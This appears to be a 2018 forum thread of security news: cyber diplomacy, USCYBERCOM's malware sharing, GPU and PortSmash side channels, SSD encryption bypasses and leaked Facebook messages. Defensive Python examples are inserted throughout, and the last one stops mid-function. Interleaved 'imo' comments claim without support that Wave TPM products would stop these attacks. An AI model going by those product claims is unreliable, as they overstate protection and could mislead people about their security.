Microsoft's Brad Smith calls on nations and businesses to work toward "digital peace" and acknowledge the effects of cybercrime.
It's an exciting time to be in technology, according to Microsoft president Brad Smith. It's also a dangerous time.
Smith took the stage at this year's Web Summit, a tech conference held in Lisbon, Portugal, to emphasize the need for global cooperation on cybersecurity as technology continues to evolve. The benefits that technology has created are as dangerous as they are awe-inspiring, he said.
"It's an exciting time to be at a place like this," he said. "But that's not the only thing that's happening. We also live in a time when new threats are emerging … new threats that involve technology itself" and culminate in attacks on electrical grids and elections alike.
Addressing an audience of tech professionals, Smith explained: "The tools that we've created — the tools, oftentimes, that you've created — have been turned by others into weapons." It's something Microsoft sees in 6.5 trillion signals and data points it receives daily, he added.
Smith said often when he speaks to people in government about these attacks, they sometimes say "we don't really need to worry" because cyberattacks involve machines targeting machines, not machines targeting people. He disagrees.
"That is a problem. Because people are being victimized by these attacks," he explained. He called 2017 "a wake-up call" in terms of the way people in nation-states and governments are using technological tools as weapons. WannaCry and NotPetya were the prime examples.
We can't expect people to recognize the problems of cybercrime if we don't recognize how people are suffering. Hospitals were paralyzed when WannaCry hit the UK. At England's National Health Service, 19,000 appointments were canceled. Surgeries didn't happen. Shortly after WannaCry hit 300,000 machines in 150 countries, he added, NotPetya struck.
"What NotPetya represents is not just the evolution of the attack in terms of methodologies involved, but also the evolution of intent," said Smith. Last year, almost 1 billion people were victims of a cyberattack. "These issues and these threats are going to continue to grow … because everything is connected," he warned. It's time to have a conversation around security.
"In a world where everything is connected, everything can be disrupted," he continued.
Governments around the world must play a role in protecting civilians and civilian infrastructure, he said, and protect people while they're using devices on which their lives exist. However, governments can't do this alone, and so he also called on businesses to step up.
"Businesses need to do better as well, and there is no part of the business community, across Europe or in the US or around the world, that has a higher responsibility than one part of the business community — and that is the tech sector," Smith noted. IT has the greatest responsibility to be "first responders" in keeping people safe when there are cyberattacks.
The same week he gave this talk at Web Summit, Smith explained in an interview with CNBC how Microsoft wants to connect with Congress and work together to create cybersecurity guidelines for civilians. Key issues range from threats on democracy to artificial intelligence in the workplace.
We have reached a point at which people are enthusiastic about the evolution of technology; however, their eagerness is matched with growing worry about what this technology can do.
"The big shift has been [that] the era where everyone was just excited about technology has become an era where people are excited and concerned at the same time — and that's not unreasonable," he explained in a conversation with CNBC.
Smith says Microsoft wants to work with President Trump, as it worked with President Obama, to address the risk of technology. The concern isn't only for America, but for all countries.
==================================================================
How has cybersecurity really improved under the Obama and Trump administrations? Maybe Microsoft's message will include the missing ingredient to better cybersecurity - an activated TPM and services with it. The tech industry has spent billions to develop this state of the art technology for cybersecurity. It seems like it would be wise to use it on a global scale before there are more serious cyber attacks. imo.
==================================================================
https://www.wavesys.com/
US Cyber Command starts uploading foreign APT malware to VirusTotal
https://www.zdnet.com/article/us-cyber-command-starts-uploading-foreign-apt-malware-to-virustotal/
USCYBERCOM said it plans to regularly upload "unclassified malware samples" to VirusTotal
On Monday, the Cyber National Mission Force (CNMF), a subordinate unit of US Cyber Command (USCYBERCOM), set in motion a new initiative through which the DOD would share malware samples it discovered on its networks with the broader cybersecurity community.
The CNMF kicked off this new project by creating an account on VirusTotal, an online file scanning service that also doubles as an online malware repository, and by uploading two malware samples.
In addition, USCYBERCOM also created a new Twitter account where it would tweet a link to all new VirusTotal malware uploads.
USCYBERCOM's decision was met with universal praise by leading voices from the cybersecurity private sector.
"This is a great initiative and we believe that if more governments would do the same, the world would be safer. We salute their initiative and are of course paying close attention to what they upload," said Costin Raiu, Director of Global Research & Analysis Team at Kaspersky Lab.
"We believe that having more files in VirusTotal increases the value to the entire community," said Mike Wiacek, CSO, and co-founder of Chronicle, Alphabet's cyber-security division and the company behind VirusTotal.
"In fact, the first submission, for LoJack malware, included files that weren't previously in VirusTotal," Wiacek told ZDNet today via email.
That new file was rpcnetp.dll, a file that, together with the second, rpcnetp.exe, has been utilized to infect victims with the Computrace/LoJack/LoJax malware.
Raiu told ZDNet that Kaspersky has been tracking this malware for years; malware which came back to life this year in new campaigns, as detected by Netscout and ESET.
LoJax is currently the first documented case of a UEFI rootkit used in the wild, and the malware has been tied to APT28, a codename used to identify a nation-state cyber-espionage group that has been associated by several Western countries to Russia's military intelligence agency GRU.
USCYBERCOM's decision to make these two particular malware samples its first two uploads didn't go unnoticed by the infosec community. Some sharp-eyed pundits immediately categorized it as a new name-and-shame effort on the part of Western governments, which have been very active this year in exposing and indicting Chinese, Russian, Iranian, and North Korean hackers.
"It remains to be seen exactly how this new initiative will unfold," John Hultquist, director of intelligence analysis at FireEye told ZDNet in an email today.
"But what is striking about this initiative is it lacks many of the contextual elements of the name and shame strategy. Whereas that strategy involves a tremendous amount of context which has to be scrutinized throughout the government, this initiative could be less encumbered by those considerations," Hultquist said.
"There will undoubtedly still be a strategy behind these disclosures, since disclosures always have consequences for intelligence operations, but their simplicity may allow for simpler, faster action, something the government has historically struggled with."
On the other hand, there are those security researchers who purposely stay away from politically-charged attributions when dealing with APT malware.
For example, in an interview with ZDNet, Alexis Dorais-Joncas, Security Intelligence Team Lead at ESET, was far more interested in how USCYBERCOM's VirusTotal uploads might influence an APT group's upcoming operations, rather than the political downfall that follows.
"As far as exposing hacking toolsets, it does not necessarily automatically render the tools totally useless, but it is likely to at least cause the attacker to adapt," Dorais-Joncas told us. "For example, ESET has been exposing [APT28]'s toolset evolution for years, and yet the group is still using a lot of the same tools, albeit with additional improvements added over time."
"I would say exposing full [tactics, techniques, and procedures] on top of actual samples would be more harmful to attackers, as they would need to change their entire attack workflow (think spreading and infection mechanisms, persistence, communication protocols, etc)," Dorais-Joncas said. "It does not look like USCYBERCOM is providing such context together with the samples they are sharing, so that might limit the upside of their initiative."
"Only time will tell if samples shared by USCYBERCOM will turn up to be interesting for researchers or not - it really depends on what they choose to share," the ESET researcher added. "I'm inclined to give them the benefit of the doubt for now."
But the infosec community also had another gripe with USCYBERCOM's new sharing practice, and that's with what the DOD considers "unclassified malware samples."
Both ESET's Dorais-Joncas and FireEye's Hultquist shared the same opinion on this topic --that even if the agency used the term "unclassified malware samples," this doesn't necessarily mean we'll get your run-of-the-mill malware such as adware and basic downloaders.
"This effort may very well expose us to new threats, which require serious analysis," Hultquist said.
"I would also not presume that unclassified malware will automatically already be known to researchers," Dorais-Joncas also added.
"In general, I would say more sample sharing can only lead to equal or better protection because any new sample security vendors can obtain helps them improve their detection databases and thus better protect their respective customers."
As for Wiacek, the Chronicle CSO would love to see other intelligence and law enforcement agencies follow in the DOD's footsteps.
"We invite other U.S. and international agencies to participate in a similar manner," Wiacek said. "We are happy to see new members in the VirusTotal community."
=================================================================
The government, if it were privy to all the anti-malware solutions in the marketplace, would see that a whitelisting product like Wave Endpoint Monitor is so much more effective than loading foreign APT malware in VirusTotal. imo.
==================================================================
https://www.wavesys.com/malware-protection
Excerpt:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient zero who discovers he is infected for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strain of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
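The boot-value comparison described in this excerpt (and in the identical Wave Endpoint Monitor excerpt quoted earlier in this thread) as an added worked example. This is my own simplified model, not Wave's code and not a real TPM driver: it assumes SHA-256 PCRs, constructed sample boot logs, and PCR indices that only loosely follow TCG PC Client conventions. It shows both halves of the check: that the event log reproduces the hardware PCR values (so a "lying" boot record is caught), and that this boot's values match the known-good baseline.

```python
import hashlib

PCR_SIZE = 32
PCR_INIT = bytes(PCR_SIZE)          # TPM 2.0 SHA-256 PCRs start as all zeros


def measure(component):
    """Digest of a boot component, as firmware would hash it before extending."""
    return hashlib.sha256(component).digest()


def extend(pcr_value, digest):
    """TPM PCR_Extend: new = H(old || digest). Order-dependent and irreversible."""
    return hashlib.sha256(pcr_value + digest).digest()


def replay_log(events):
    """Replay a measured-boot event log into final PCR values.
    events: list of (pcr_index, component_name, component_bytes)."""
    pcrs = {}
    for index, _name, component in events:
        pcrs[index] = extend(pcrs.get(index, PCR_INIT), measure(component))
    return pcrs


def verify_log(events, reported_pcrs):
    """True only if replaying the log reproduces the PCR values the TPM reports.
    A doctored log (the 'boot record lying') no longer matches the hardware."""
    return replay_log(events) == reported_pcrs


def compare_boot(baseline_pcrs, current_pcrs):
    """Diff this boot's PCRs against the recorded known-good baseline."""
    alerts = []
    for index in sorted(set(baseline_pcrs) | set(current_pcrs)):
        expected = baseline_pcrs.get(index)
        actual = current_pcrs.get(index)
        if expected is None:
            alerts.append(f"PCR{index}: measured this boot but absent from baseline")
        elif actual is None:
            alerts.append(f"PCR{index}: present in baseline but not measured this boot")
        elif expected != actual:
            alerts.append(f"PCR{index}: value changed since baseline "
                          f"({expected.hex()[:12]}... -> {actual.hex()[:12]}...)")
    return alerts


def changed_components(baseline_events, current_events):
    """The PCRs only say *that* something changed; the logs say *which* component."""
    base = {(i, n): measure(c) for i, n, c in baseline_events}
    cur = {(i, n): measure(c) for i, n, c in current_events}
    return sorted(f"PCR{i}/{n}" for (i, n) in base if cur.get((i, n)) != base[(i, n)])


# Constructed sample boot logs (not real firmware measurements). PCR indices
# loosely follow TCG PC Client usage: 0 firmware, 4 boot manager, 7 Secure Boot policy.
KNOWN_GOOD_BOOT = [
    (0, "platform-firmware", b"VENDOR BIOS 1.2.0"),
    (0, "firmware-config", b"secure_boot=enabled"),
    (4, "boot-manager", b"bootmgfw.efi build 1000"),
    (7, "secure-boot-policy", b"db=[vendor-cert] dbx=[revoked-1]"),
]

# Same machine, but the boot manager on disk has been replaced (bootkit-style change).
TAMPERED_BOOT = [
    (0, "platform-firmware", b"VENDOR BIOS 1.2.0"),
    (0, "firmware-config", b"secure_boot=enabled"),
    (4, "boot-manager", b"bootmgfw.efi build 1000 + patched"),
    (7, "secure-boot-policy", b"db=[vendor-cert] dbx=[revoked-1]"),
]


def run_monitor(baseline_events, boot_events, reported_pcrs):
    """One monitor cycle: check the log is honest, then diff against the baseline.
    Returns an empty list for a clean boot, otherwise the alerts to raise."""
    if not verify_log(boot_events, reported_pcrs):
        return ["event log does not reproduce TPM PCR values: log tampered or truncated"]
    alerts = compare_boot(replay_log(baseline_events), reported_pcrs)
    if alerts:
        alerts.append("changed components: "
                      + ", ".join(changed_components(baseline_events, boot_events)))
    return alerts


if __name__ == "__main__":
    print("clean boot:", run_monitor(KNOWN_GOOD_BOOT, KNOWN_GOOD_BOOT, replay_log(KNOWN_GOOD_BOOT)))
    print("tampered boot:", run_monitor(KNOWN_GOOD_BOOT, TAMPERED_BOOT, replay_log(TAMPERED_BOOT)))
    # A clean-looking log presented with the tampered machine's PCRs is caught as a forgery.
    print("forged log:", run_monitor(KNOWN_GOOD_BOOT, KNOWN_GOOD_BOOT, replay_log(TAMPERED_BOOT)))
```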
GPU side channel attacks can enable spying on web activity, password stealing
https://www.helpnetsecurity.com/2018/11/06/gpu-side-channel-attacks/
Computer scientists at the University of California, Riverside have revealed for the first time how easily attackers can use a computer’s graphics processing unit, or GPU, to spy on web activity, steal passwords, and break into cloud-based applications.
Marlan and Rosemary Bourns College of Engineering computer science doctoral student Hoda Naghibijouybari and post-doctoral researcher Ajaya Neupane, along with Associate Professor Zhiyun Qian and Professor Nael Abu-Ghazaleh, reverse engineered a Nvidia GPU to demonstrate three attacks on both graphics and computational stacks, as well as across them.
All three attacks require the victim to first acquire a malicious program embedded in a downloaded app. The program is designed to spy on the victim’s computer.
Web browsers use GPUs to render graphics on desktops, laptops, and smart phones. GPUs are also used to accelerate applications on the cloud and data centers. Web graphics can expose user information and activity. Computational workloads enhanced by the GPU include applications with sensitive data or algorithms that might be exposed by the new attacks.
GPUs are usually programmed using application programming interfaces, or APIs, such as OpenGL. OpenGL is accessible by any application on a desktop with user-level privileges, making all attacks practical on a desktop. Since desktop or laptop machines by default come with the graphics libraries and drivers installed, the attack can be implemented easily using graphics APIs.
The first attack tracks user activity on the web. When the victim opens the malicious app, it uses OpenGL to create a spy to infer the behavior of the browser as it uses the GPU. Every website has a unique trace in terms of GPU memory utilization due to the different number of objects and different sizes of objects being rendered. This signal is consistent across loading the same website several times and is unaffected by caching.
The researchers monitored either GPU memory allocations over time or GPU performance counters and fed these features to a machine learning based classifier, achieving website fingerprinting with high accuracy. The spy can reliably obtain all allocation events to see what the user has been doing on the web.
In the second attack, the authors extracted user passwords. Each time the user types a character, the whole password textbox is uploaded to GPU as a texture to be rendered. Monitoring the interval time of consecutive memory allocation events leaked the number of password characters and inter-keystroke timing, well-established techniques for learning passwords.
The third attack targets a computational application in the cloud. The attacker launches a malicious computational workload on the GPU which operates alongside the victim’s application. Depending on neural network parameters, the intensity and pattern of contention on the cache, memory and functional units differ over time, creating measurable leakage. The attacker uses machine learning-based classification on performance counter traces to extract the victim’s secret neural network structure, such as number of neurons in a specific layer of a deep neural network.
The researchers reported their findings to Nvidia, who responded that they intend to publish a patch that offers system administrators the option to disable access to performance counters from user-level processes. They also shared a draft of the paper with the AMD and Intel security teams to enable them to evaluate their GPUs with respect to such vulnerabilities.
In the future the group plans to test the feasibility of GPU side channel attacks on Android phones.
=================================================================
Why wait for Nvidia, Intel and AMD for a patch for this potentially severe problem? A proactive approach would be to use Wave VSC 2.0 and store the PIN number in the TPM to avoid any potential pitfalls. In Wave VSC 2.0, the user can forget about any passwords (credentials) because they are secured in the TPM and not accessible by a threat such as the one in this article. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Flaws in Popular SSD Drives Bypass Hardware Disk Encryption
https://www.bleepingcomputer.com/news/security/flaws-in-popular-ssd-drives-bypass-hardware-disk-encryption/
Researchers have found flaws that can be exploited to bypass hardware decryption without a password in well known and popular SSD drives.
In a new report titled "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)", researchers Carlo Meijer and Bernard van Gastel from Radboud University explain how they were able to modify the firmware or use a debugging interface to modify the password validation routine in SSD drives to decrypt hardware encrypted data without a password.
The researchers tested these methods against well known and popular SSD drives such as the Crucial MX100, Crucial MX200, Crucial MX300, Samsung 840 EVO, Samsung 850 EVO, Samsung T3 Portable, and Samsung T5 Portable and were able to illustrate methods to access the encrypted drive's data.
"We have analyzed the hardware full-disk encryption of several SSDs by reverse engineering their firmware," stated the report. "In theory, the security guarantees offered by hardware encryption are similar to or better than software implementations. In reality, we found that many hardware implementations have critical security weaknesses, for many models allowing for complete recovery of the data without knowledge of any secret."
To make matters worse, as Windows' BitLocker software encryption will default to hard drive encryption if supported, it can be bypassed using the same discovered flaws.
Accessing encrypted files without knowing the password
To bypass decryption passwords, the researchers utilized a variety of techniques depending on whether debug ports were available, the ATA Security self-encrypting drive (SED) standard was being used, or if the newer TCG Opal SED specification was being used.
These flaws were responsibly disclosed to Crucial and Samsung to give them time to prepare firmware updates. New firmware is available for Crucial SSD drives, while Samsung has only released new firmware for their T3 and T5 Portable SSD drives. For their non-portable drives (EVO), they recommend that users utilize software encryption instead.
Crucial MX100, Crucial MX200, & Samsung T3 Portable
For the Crucial MX100, Crucial MX200, and Samsung T3 Portable SSD drives, the researchers were able to connect to the drive's JTAG debugging interfaces and modify the password validation routine so that it always validates as successful regardless of the password that is entered. This allows them to enter any password and have the drive unlocked.
Crucial MX300 SSD Drive
The Crucial MX300 also has a JTAG debugging port, but it is disabled on the drive.
Therefore, the researchers had to rely on a more complicated routine of flashing the device with a modified firmware that allows them to perform various routines, which ultimately allow them to either decrypt the password or authenticate to the device using an empty password.
Samsung 840 EVO and Samsung 850 EVO SSD Drives
Depending on which SED specification is used, the researchers were able to access the encrypted data by either connecting to the JTAG debug port and modifying the password validation routine or by using a wear-level issue that allows them to recover the cryptographic secrets needed to unlock the drive from a previous unlocked instance.
The Samsung 850 EVO does not have the wear-level issue, so they would need to rely on the modification of the password-validation routine through the debug port.
BitLocker fails by defaulting to hardware encryption
Most modern operating systems provide software encryption that allows a user to perform whole disk encryption. While the software encryption offered by Linux, macOS, Android, and iOS is strong, BitLocker on Windows falls prey to the SSD flaw by defaulting to hardware encryption when available.
When using BitLocker to encrypt a disk in Windows, if the operating system detects an SSD with hardware encryption, it will automatically default to using it. This allows drives encrypted by BitLocker using hardware encryption to be decrypted by the same flaws discussed above. BitLocker software encryption is secure as expected.
In order to prevent the use of SSD hardware encryption, the researchers suggest that users disable its use using a Windows Group Policy at "Computer Configuration\Administrative Templates\Windows Components\BitLocker Drive Encryption\Operating System Drives" called "Configure use of hardware-based encryption for operating system drives".
This policy is also available for removable and fixed data drives and should be disabled for them as well to enforce software encryption.
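A way to find out whether any BitLocker volume on a machine already relies on the SSD's hardware encryption, as an added example (not Microsoft's or Wave's code): it parses the text that `manage-bde -status` prints on Windows and lists the drives whose Encryption Method is the drive's own engine. The sample output below is constructed.

```python
"""List BitLocker volumes that fell back to the SSD's hardware encryption,
which the Radboud research shows can be bypassed on affected drives.

Added example, not Microsoft's or Wave's code. It parses the text printed
by `manage-bde -status`; the sample below is constructed. Feed the real
command's output to parse_manage_bde() on a Windows host.
"""
import re
import subprocess

VOLUME_HEADER = re.compile(r"^Volume ([A-Z]): \[(.*)\]")
# Indented "Field:   value" lines; "Key Protectors:" has no value and is skipped.
FIELD_LINE = re.compile(r"^ {4}([A-Za-z ]+?):\s+(\S.*?)\s*$")


def parse_manage_bde(text: str) -> list[dict]:
    """Split manage-bde output into one {field: value} dict per volume."""
    volumes, current = [], None
    for line in text.splitlines():
        if (m := VOLUME_HEADER.match(line)):
            current = {"drive": m.group(1), "label": m.group(2)}
            volumes.append(current)
        elif current is not None and (m := FIELD_LINE.match(line)):
            current[m.group(1)] = m.group(2)
    return volumes


def hardware_encrypted(volumes: list[dict]) -> list[str]:
    """Drive letters whose BitLocker protection relies on the drive's SED engine.

    Setting the group policy named in the article only affects volumes encrypted
    afterwards; a drive listed here must be decrypted and re-encrypted to move
    to software encryption.
    """
    return [v["drive"] for v in volumes
            if v.get("Encryption Method", "").lower().startswith("hardware")]


def live_status() -> list[dict]:
    """Run manage-bde on the local Windows host (needs an elevated prompt)."""
    out = subprocess.run(["manage-bde", "-status"], capture_output=True,
                         text=True, check=True).stdout
    return parse_manage_bde(out)


# Constructed sample: C: uses the SSD's hardware encryption, D: software XTS-AES.
SAMPLE_STATUS = """\
BitLocker Drive Encryption: Configuration Tool version 10.0.17134

Disk volumes that can be protected with
BitLocker Drive Encryption:
Volume C: [OSDisk]
[OS Volume]

    Size:                 476.00 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    Hardware Encryption - 1.3.111.2.1619.0.1.2
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        TPM
        Numerical Password

Volume D: [Data]
[Data Volume]

    Size:                 931.00 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    XTS-AES 128
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        Password
"""

if __name__ == "__main__":
    exposed = hardware_encrypted(parse_manage_bde(SAMPLE_STATUS))
    print("volumes on drive hardware encryption:", ", ".join(exposed) or "none")
```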
=================================================================
If Wave VSC 2.0 was used on a SED, these JTAG debugging interfaces may not come into play due to the TPM storing the first (PIN number) and second factors of authentication. It would bring a company's cybersecurity level up. imo. There are probably a lot of SEDs that could use Wave VSC 2.0 along with the rest of a company's computer fleet! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Private messages from 81,000 hacked Facebook accounts for sale
https://www.bbc.com/news/technology-46065796
Hackers appear to have compromised and published private messages from at least 81,000 Facebook users' accounts.
The perpetrators told the BBC Russian Service that they had details from a total of 120 million accounts, which they were attempting to sell, although there are reasons to be sceptical about that figure.
Facebook said its security had not been compromised.
And the data had probably been obtained through malicious browser extensions.
Facebook added it had taken steps to prevent further accounts being affected.
The BBC understands many of the users whose details have been compromised are based in Ukraine and Russia. However, some are from the UK, US, Brazil and elsewhere.
The hackers offered to sell access for 10 cents (8p) per account. However, their advert has since been taken offline.
"We have contacted browser-makers to ensure that known malicious extensions are no longer available to download in their stores," said Facebook executive Guy Rosen.
"We have also contacted law enforcement and have worked with local authorities to remove the website that displayed information from Facebook accounts."
Intimate correspondence
The breach first came to light in September, when a post from a user nicknamed FBSaler appeared on an English-language internet forum.
"We sell personal information of Facebook users. Our database includes 120 million accounts," the user wrote.
The cyber-security company Digital Shadows examined the claim on behalf of the BBC and confirmed that more than 81,000 of the profiles posted online as a sample contained private messages.
Data from a further 176,000 accounts was also made available, although some of the information - including email addresses and phone numbers - could have been scraped from members who had not hidden it.
The BBC Russian Service contacted five Russian Facebook users whose private messages had been uploaded and confirmed the posts were theirs.
One example included photographs of a recent holiday, another was a chat about a recent Depeche Mode concert, and a third included complaints about a son-in-law.
There was also an intimate correspondence between two lovers.
One of the websites where the data had been published appeared to have been set up in St Petersburg.
Its IP address has also been flagged by the Cybercrime Tracker service. It says the address had been used to spread the LokiBot Trojan, which allows attackers to gain access to user passwords.
Who should be blamed?
Personal shopping assistants, bookmarking applications and even mini-puzzle games are all on offer from various browsers such as Chrome, Opera and Firefox as third-party extensions.
The little icons sit alongside your URL address bar patiently waiting for you to click on them.
According to Facebook, it was one such extension that quietly monitored victims' activity on the platform and sent personal details and private conversations back to the hackers.
Facebook has not named the extensions it believes were involved but says the leak was not its fault.
Independent cyber-experts have told the BBC that if rogue extensions were indeed the cause, the browsers' developers might share some responsibility for failing to vet the programs, assuming they were distributed via their marketplaces.
But the hack is still bad news for Facebook.
The embattled network has had a terrible year for data security and questions will be asked about whether it is proactive enough in responding to situations like this that affect large numbers of people.
The BBC Russian Service emailed the address listed alongside the hacked details, posing as a buyer interested in buying two million accounts' details.
The advertiser was asked whether the breached accounts were the same as those involved in either the Cambridge Analytica scandal or the subsequent security breach revealed in September.
A reply in English came from someone calling themself John Smith.
He said that the information had nothing to do with either data leak.
He claimed that his hacking group could offer data from 120 million users, of whom 2.7 million were Russians.
But Digital Shadows told the BBC that this claim was doubtful because it was unlikely Facebook would have missed such a large breach.
John Smith did not explain why he had not advertised his services more widely.
And when asked whether the leaks were linked to the Russian state or to the Internet Research Agency - a group of hackers linked to the Kremlin - he replied: "No."
=================================================================
Scrambls Introduces Secure Personal Sharing Across Social Networks & Websites
Users Regain Control over Personal Content when Posting Online
https://www.wavesys.com/buzz/pr/scrambls-introduces-secure-personal-sharing-across-social-networks-websites
Palo Alto, CA -
May 2, 2012 -
Today, scrambls launched as a free service empowering users to control and protect the messages they post to the web. Scrambls works on all of the most popular social media sites by means of a simple, yet secure web browser plug-in. It gives everyone the ability to share private communications online, and establishes personal control of every tweet, blog post or status update.
To scrambl messages, you simply enable scrambls in your browser to encode part or all of a message before it’s instantly uploaded to your favorite social media site. The cloud gets only scrambld content. You select the individuals or groups that can see the message in clear text on their devices. Friends just need to add scrambls to their own browser and messages will look the same as usual for them. Anyone else that was not approved to read the post will see only scrambld text.
“Greater control enables greater use of social media,” said Michael Sprague, scrambls co-creator. “Post confidently, knowing your boss won’t see messages meant for high school friends, and permanent records of what you say online won’t come back to haunt you in the future.”
Scrambls makes sharing content simple, safe and fun, while establishing lasting control for everything written and shared online. When entering status updates, tweets, blog posts and more, scrambls empowers you not only with the ability to choose who can see your postings—but also when messages appear, for how long and much more. And if you post something and then change your mind, you can even take it back simply by changing the groups or individuals permitted to read that post. Scrambld messages truly remain private because online services can’t read or scan the data of every post.
Scrambls helps users safeguard their privacy while protecting the huge investment in time and personal effort that goes into building a social reputation, so it’s possible to have older posts remain on a social media site, but altered to be only accessible by your family or close friends.
Get Started with Scrambls
Anyone can start using scrambls today by downloading the plug-in from www.scrambls.com, and choosing the version that works with your preferred web browser. Once installed, a switch will appear in your browser, allowing you to choose the individuals or groups that can read your posts—just select the group from a drop-down list. Then type as you usually would in any website, and the content is automatically scrambld on your device before it is uploaded to the site you are on.
To see what scrambld messages look like, view the short startup video here.
Social media providers can augment the privacy and security of their services with scrambls, and application developers can build scrambls into their own solutions as well. Along with the launch of the service, scrambls is releasing a software developer kit (SDK) to enable third-party apps and sites to integrate scrambls. Businesses can leverage the SDK to incorporate scrambls into their existing corporate policy services.
About Scrambls
Scrambls is a service developed by Wave Systems Corp. (NASDAQ: WAVX) that makes online sharing simple and safe. All you need is the scrambls plug-in added to your browser toolbar. You can make any post private with just one click, even if you’re publishing to different groups of contacts spread across multiple social networks. Scrambls lets you decide what the privacy policy will be for each post that you share. Scrambls makes online sharing smarter, with control over what you are sharing and whom you are sharing it with.
PortSmash attack punches hole in Intel's Hyper-Thread CPUs, leaves with crypto keys
https://www.theregister.co.uk/2018/11/02/portsmash_intel_security_attack/
Malware already on machines can exploit SMT with side-channel techniques to snatch secrets
Brainiacs in Cuba and Finland have found a new side-channel vulnerability in Intel x64 processors that could allow an attacker to sniff out cryptographic keys and other privileged information.
Following disclosure of the flaw to Intel at the beginning of October, boffins from the Tampere University of Technology in Finland and Technical University of Havana, Cuba, today published a proof-of-concept they're calling PortSmash.
The research team used the PoC to steal an OpenSSL (version 1.1.0h or less) P-384 private key from a TLS server. (Subsequent versions of OpenSSL aren't susceptible.)
To pull off this secret surveillance, the exploit code must run on the system under attack, specifically on the same CPU core as the process you want to pry into. That means it can't be used to eavesdrop on software remotely, or easily on the same host, but it could be useful for determined miscreants and snoops who have managed to infiltrate someone else's computer. You basically have to already be able to run your own evil code on a machine in order to PortSmash it.
In a post to a security mailing list, Bill Brumley, assistant professor in the department of pervasive computing at Tampere University of Technology, said the information leakage was made possible thanks to Intel's implementation of simultaneous multi-threading, known as Hyper-Threading.
SMT works by allowing, typically, two separate running programs to share the same CPU core at more or less the same time: two threads in two independent processes can run alongside each other in a single processor core. If you have four cores, and two of these SMT hardware threads per core, then that's effectively eight cores per processor as far as application software is concerned, which means more stuff can be executed per second. SMT therefore boosts performance, but in some cases, can reduce performance depending on the workload type.
The downside is that it is possible for code in one hardware thread to look over the shoulder of code in the other hardware thread, on the same core, and work out what its partner is doing. It can do this by studying patterns of access to caches, or timing how long it takes to complete an operation. This is why developers of cryptography software are encouraged to build in defenses to thwart side-channel eavesdropping.
"We detect port contention to construct a timing side channel to exfiltrate information from processes running in parallel on the same physical core," as Brumley put it.
Thus, the attack works by running the PortSmash process alongside a selected victim process, on the same CPU core, with each process using one of the core's two SMT hardware threads. The PortSmash code then measures timing discrepancies to snoop on the operations performed by the other process, and gradually discern its protected data.
That means if the spied-upon process is performing some kind of cryptography, it is possible for the PortSmash process sharing the same CPU core to extract secret information, such as a decryption key, from its victim program.
The fix, Brumley suggests, is to disable SMT/Hyper-Threading in the processor chip's BIOS. OpenBSD already disables Intel's Hyper-Threading for security reasons.
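A check a defender can run before deciding on the SMT question above, as an added example (not the PortSmash researchers' code): it parses Linux `/proc/cpuinfo`, groups logical CPUs by physical core, and reports whether any core exposes two hardware threads, the sharing PortSmash depends on. The cpuinfo text below is constructed for a 2-core, 4-thread part.

```python
"""Report whether SMT/Hyper-Threading is active and which logical CPUs share a
physical core (the condition a PortSmash spy and its victim must be in).

Added example, not the PortSmash researchers' code. Reads /proc/cpuinfo on
Linux; the sample text is constructed. On recent Linux kernels SMT can be
turned off at runtime by writing "off" to /sys/devices/system/cpu/smt/control,
which matches the BIOS-level fix suggested in the article.
"""
from collections import defaultdict
from pathlib import Path


def parse_cpuinfo(text: str) -> list[dict]:
    """Return one {field: value} dict per 'processor' stanza."""
    cpus, current = [], {}
    for line in text.splitlines():
        if not line.strip():          # blank line ends a stanza
            if current:
                cpus.append(current)
            current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        cpus.append(current)
    return cpus


def core_siblings(cpus: list[dict]) -> dict[tuple[int, int], list[int]]:
    """Group logical CPU numbers by (physical id, core id)."""
    groups = defaultdict(list)
    for c in cpus:
        key = (int(c.get("physical id", 0)), int(c.get("core id", c["processor"])))
        groups[key].append(int(c["processor"]))
    return {k: sorted(v) for k, v in groups.items()}


def smt_active(cpus: list[dict]) -> bool:
    """True when any physical core exposes more than one hardware thread."""
    return any(len(v) > 1 for v in core_siblings(cpus).values())


def shared_with(cpus: list[dict], logical: int) -> list[int]:
    """Other logical CPUs that share a core with `logical` (empty if none)."""
    for members in core_siblings(cpus).values():
        if logical in members:
            return [m for m in members if m != logical]
    return []


def live_report() -> dict:
    """Inspect the local Linux machine."""
    cpus = parse_cpuinfo(Path("/proc/cpuinfo").read_text())
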